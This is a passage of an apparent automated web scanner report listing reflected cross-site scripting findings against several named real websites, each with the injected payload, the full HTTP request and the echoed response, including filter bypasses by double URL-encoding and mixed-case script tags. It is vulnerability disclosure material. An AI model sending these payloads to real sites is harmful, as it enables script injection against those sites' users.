User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Expires: Fri, 30 Sep 2011 12:26:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:09 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NE304_A_999b5e77<img src=a onerror=alert(1)>a9dc4d3a216

3.334. http://s7d5.scene7.com/is/image/bluestembrands/NI213_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NI213_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e8920<img%20src%3da%20onerror%3dalert(1)>4b1acf1d81f was submitted in the REST URL parameter 4. This input was echoed as e8920<img src=a onerror=alert(1)>4b1acf1d81f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NI213_WVA_999e8920<img%20src%3da%20onerror%3dalert(1)>4b1acf1d81f?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Fri, 30 Sep 2011 12:26:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:24 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NI213_WVA_999e8920<img src=a onerror=alert(1)>4b1acf1d81f

3.335. http://s7d5.scene7.com/is/image/bluestembrands/NK993_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NK993_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78316<img%20src%3da%20onerror%3dalert(1)>531b9306b63 was submitted in the REST URL parameter 4. This input was echoed as 78316<img src=a onerror=alert(1)>531b9306b63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NK993_VA_99978316<img%20src%3da%20onerror%3dalert(1)>531b9306b63?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Fri, 30 Sep 2011 12:26:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:25 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NK993_VA_99978316<img src=a onerror=alert(1)>531b9306b63

3.336. http://s7d5.scene7.com/is/image/bluestembrands/NL522_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NL522_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ed66a<img%20src%3da%20onerror%3dalert(1)>01914ff037f was submitted in the REST URL parameter 4. This input was echoed as ed66a<img src=a onerror=alert(1)>01914ff037f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NL522_A_999ed66a<img%20src%3da%20onerror%3dalert(1)>01914ff037f?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Expires: Fri, 30 Sep 2011 12:24:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:24:33 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NL522_A_999ed66a<img src=a onerror=alert(1)>01914ff037f

3.337. http://s7d5.scene7.com/is/image/bluestembrands/NR780_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NR780_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c75cb<img%20src%3da%20onerror%3dalert(1)>ac190edb460 was submitted in the REST URL parameter 4. This input was echoed as c75cb<img src=a onerror=alert(1)>ac190edb460 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NR780_VA_999c75cb<img%20src%3da%20onerror%3dalert(1)>ac190edb460?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Fri, 30 Sep 2011 12:26:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:25 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NR780_VA_999c75cb<img src=a onerror=alert(1)>ac190edb460

3.338. http://s7d5.scene7.com/is/image/bluestembrands/NS114_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NS114_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cdb4c<img%20src%3da%20onerror%3dalert(1)>714edd83976 was submitted in the REST URL parameter 4. This input was echoed as cdb4c<img src=a onerror=alert(1)>714edd83976 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NS114_VA_999cdb4c<img%20src%3da%20onerror%3dalert(1)>714edd83976?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Fri, 30 Sep 2011 12:24:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:24:33 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NS114_VA_999cdb4c<img src=a onerror=alert(1)>714edd83976

3.339. http://s7d5.scene7.com/is/image/bluestembrands/P1016_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/P1016_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 21443<img%20src%3da%20onerror%3dalert(1)>14aa5599ecd was submitted in the REST URL parameter 4. This input was echoed as 21443<img src=a onerror=alert(1)>14aa5599ecd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/P1016_VA_99921443<img%20src%3da%20onerror%3dalert(1)>14aa5599ecd?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Fri, 30 Sep 2011 12:26:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:24 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/P1016_VA_99921443<img src=a onerror=alert(1)>14aa5599ecd

3.340. http://scout.clareitysecurity.com/fj9ga/Sat.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scout.clareitysecurity.com
Path:   /fj9ga/Sat.ashx

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 789ec'%3balert(1)//afdcaa50a62 was submitted in the id parameter. This input was echoed as 789ec';alert(1)//afdcaa50a62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fj9ga/Sat.ashx?id=5288cd7b-4c6c-475c-9dd9-9ac1cfa5b478789ec'%3balert(1)//afdcaa50a62&sn=baae548d-c356-4bc8-ba30-3c4fb7974efa&msg=&type=0&url=http%3A%2F%2Fclareitysecurity.com%2F&rf=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp%3Fc1%3D6%26c2%3D268&if=false&cb=1317385100364&used=false HTTP/1.1
Host: scout.clareitysecurity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clareitysecurity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=95809102.1147496385.1317385099.1317385099.1317385099.1; __utmb=95809102.1.10.1317385099; __utmc=95809102; __utmz=95809102.1317385099.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Expires: Thu, 30 Sep 2010 12:18:58 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
S: NRV4
Date: Fri, 30 Sep 2011 12:18:58 GMT
Content-Length: 671


<html><head>
<script type='text/javascript'>var ADMITONE; if (!ADMITONE) { ADMITONE = {}; } ADMITONE.pageHitUrl = 'http://scout.clareitysecurity.com/fj9ga/PageHit.ashx'; ADMITONE.instanceName='fj9ga'; ADMITONE.transactionid = '5288cd7b-4c6c-475c-9dd9-9ac1cfa5b478789ec';alert(1)//afdcaa50a62'; ADMITONE.sessionid = 'baae548d-c356-4bc8-ba30-3c4fb7974efa'; ADMITONE.doFullSilentCollection = true; ADMITONE.isFirstPage=false;; ;</script>
...[SNIP]...

3.341. http://scout.clareitysecurity.com/fj9ga/Sat.ashx [sn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scout.clareitysecurity.com
Path:   /fj9ga/Sat.ashx

Issue detail

The value of the sn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c484'%3balert(1)//bfff91a0391 was submitted in the sn parameter. This input was echoed as 9c484';alert(1)//bfff91a0391 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fj9ga/Sat.ashx?id=5288cd7b-4c6c-475c-9dd9-9ac1cfa5b478&sn=baae548d-c356-4bc8-ba30-3c4fb7974efa9c484'%3balert(1)//bfff91a0391&msg=&type=0&url=http%3A%2F%2Fclareitysecurity.com%2F&rf=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp%3Fc1%3D6%26c2%3D268&if=false&cb=1317385100364&used=false HTTP/1.1
Host: scout.clareitysecurity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clareitysecurity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=95809102.1147496385.1317385099.1317385099.1317385099.1; __utmb=95809102.1.10.1317385099; __utmc=95809102; __utmz=95809102.1317385099.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Expires: Thu, 30 Sep 2010 12:19:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
S: NRV4
Date: Fri, 30 Sep 2011 12:19:00 GMT
Content-Length: 671


<html><head>
<script type='text/javascript'>var ADMITONE; if (!ADMITONE) { ADMITONE = {}; } ADMITONE.pageHitUrl = 'http://scout.clareitysecurity.com/fj9ga/PageHit.ashx'; ADMITONE.instanceName='fj9ga'; ADMITONE.transactionid = '5288cd7b-4c6c-475c-9dd9-9ac1cfa5b478'; ADMITONE.sessionid = 'baae548d-c356-4bc8-ba30-3c4fb7974efa9c484';alert(1)//bfff91a0391'; ADMITONE.doFullSilentCollection = true; ADMITONE.isFirstPage=false;; ;</script>
...[SNIP]...

3.342. https://secure.bhphotovideo.com/find/unsubscribeCatalogs.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /find/unsubscribeCatalogs.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0636"><x%20style%3dx%3aexpression(alert(1))>29427ce22fe was submitted in the REST URL parameter 2. This input was echoed as c0636"><x style=x:expression(alert(1))>29427ce22fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /find/unsubscribeCatalogs.jspc0636"><x%20style%3dx%3aexpression(alert(1))>29427ce22fe HTTP/1.1
Host: secure.bhphotovideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7,chrome=1
Date: Fri, 30 Sep 2011 12:52:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35742

<!--<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">-->


<html>
<head>


       <link href="/Fr
...[SNIP]...
<a class="login" name="Login-Register" href="https://secure.bhphotovideo.com/bnh/controller/?O=unsubscribeCatalogs.jspc0636"><x style=x:expression(alert(1))>29427ce22fe&A=getpage&Q=Login.jsp" target="_self">
...[SNIP]...

3.343. https://secure.bhphotovideo.com/find/unsubscribeCatalogs.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /find/unsubscribeCatalogs.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2181%253c%252fscript%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e25aed6d8538 was submitted in the REST URL parameter 2. This input was echoed as c2181</script><ScRiPt>alert(1)</ScRiPt>25aed6d8538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /find/unsubscribeCatalogs.jspc2181%253c%252fscript%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e25aed6d8538 HTTP/1.1
Host: secure.bhphotovideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7,chrome=1
Date: Fri, 30 Sep 2011 12:52:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35687

<!--<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">-->


<html>
<head>


       <link href="/Fr
...[SNIP]...
<script language="javascript1.1" type="text/javascript">
    pageId='unsubscribeCatalogs.jspc2181</script><ScRiPt>alert(1)</ScRiPt>25aed6d8538';categoryId='Static';cmCreatePageviewTag(pageId,categoryId,null,null,null,'[---][---][---][---][---][---]','[---][---][---][---][---][---][---][---]','[NO-RFRL][E][B&H-Regular][---][---][---][---][---
...[SNIP]...

3.344. https://secure.swissmail.org/Generalmail/Dombox/domreg/dom-check.asp [rg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.swissmail.org
Path:   /Generalmail/Dombox/domreg/dom-check.asp

Issue detail

The value of the rg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aa20"><script>alert(1)</script>cc8bc4a943f was submitted in the rg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Generalmail/Dombox/domreg/dom-check.asp?rg=n7aa20"><script>alert(1)</script>cc8bc4a943f&dmn=xsssss.com HTTP/1.1
Host: secure.swissmail.org
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.swissmail.org/Swissmail/home/home.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rid=262251; __utma=230033182.748650729.1317385079.1317385079.1317385079.1; __utmb=230033182.1.10.1317385079; __utmc=230033182; __utmz=230033182.1317385079.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; SecureMode=y

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:23:37 GMT
Server: Microsoft-IIS/7.0
Cache-Control: private
Content-Type: text/html
Via: 1.1 secure.swissmail.org
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 17619


<!-- HTML starts here -->
<html>
<head>
<style type="text/css">
<!--
.stdfont {font-family:Arial, Helvetica, sans-serif; font-size:small;}
.bg {background-color:#CCCCFF;}
-->
</style>
<link
...[SNIP]...
<input type="hidden" name="f_rg" value="n7aa20"><script>alert(1)</script>cc8bc4a943f">
...[SNIP]...

3.345. http://server.iad.liveperson.net/hc/70582249/ [divID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/70582249/

Issue detail

The value of the divID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47aa5'%3balert(1)//d192276b303 was submitted in the divID parameter. This input was echoed as 47aa5';alert(1)//d192276b303 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hc/70582249/?cmd=mTagRepstate&site=70582249&buttonID=12&divID=lpButDivID-130512871949847aa5'%3balert(1)//d192276b303&bt=1&c=1 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.abesofmaine.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:25:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 19730

function staticButton(objName,divID,buttonName,buttonId,config,state,butHtmlTemplate,server,site,protocol,servlet,windowWidth,windowHeight){this.CHAT=1;this.VOICE=2;this.BUTTON=1;this.CHATBOX=2;this.T
...[SNIP]...
ic)=='undefined') {var lpMTagStatic={};} lpMTagStatic.lpStaticBut13173855011244548345561002503597 = new staticButton('lpMTagStatic.lpStaticBut13173855011244548345561002503597','lpButDivID-130512871949847aa5';alert(1)//d192276b303','Judes Images',12,{'id':12,'name':"Judes Images",chanel:1,enabled:true,buttonType:1,voiceType:-1,stickyType:1,description:"Static Button",buttonContent:2,addTextToButton:false,addTextToButtonText:"Ou
...[SNIP]...

3.346. http://smartparents.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartparents.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be38f"><script>alert(1)</script>d5558ed912f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?be38f"><script>alert(1)</script>d5558ed912f=1 HTTP/1.1
Host: smartparents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=6&c2=268
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:17:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 460


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>SmartParents - Making Social Networking Safer for Children. </title>

<
...[SNIP]...
<frame src="http://smartparents.cloudapp.net/?be38f"><script>alert(1)</script>d5558ed912f=1" frameborder="0" />
...[SNIP]...

3.347. http://smartparents.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartparents.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83413"><script>alert(1)</script>6c884ff98b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?83413"><script>alert(1)</script>6c884ff98b=1 HTTP/1.1
Host: smartparents.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:17:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 470


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>SmartParents - Making Social Networking Safer for Children. </title>

<
...[SNIP]...
<frame src="http://smartparents.cloudapp.net/favicon.ico?83413"><script>alert(1)</script>6c884ff98b=1" frameborder="0" />
...[SNIP]...

3.348. http://sv.liveclicker.net/service/api [var parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sv.liveclicker.net
Path:   /service/api

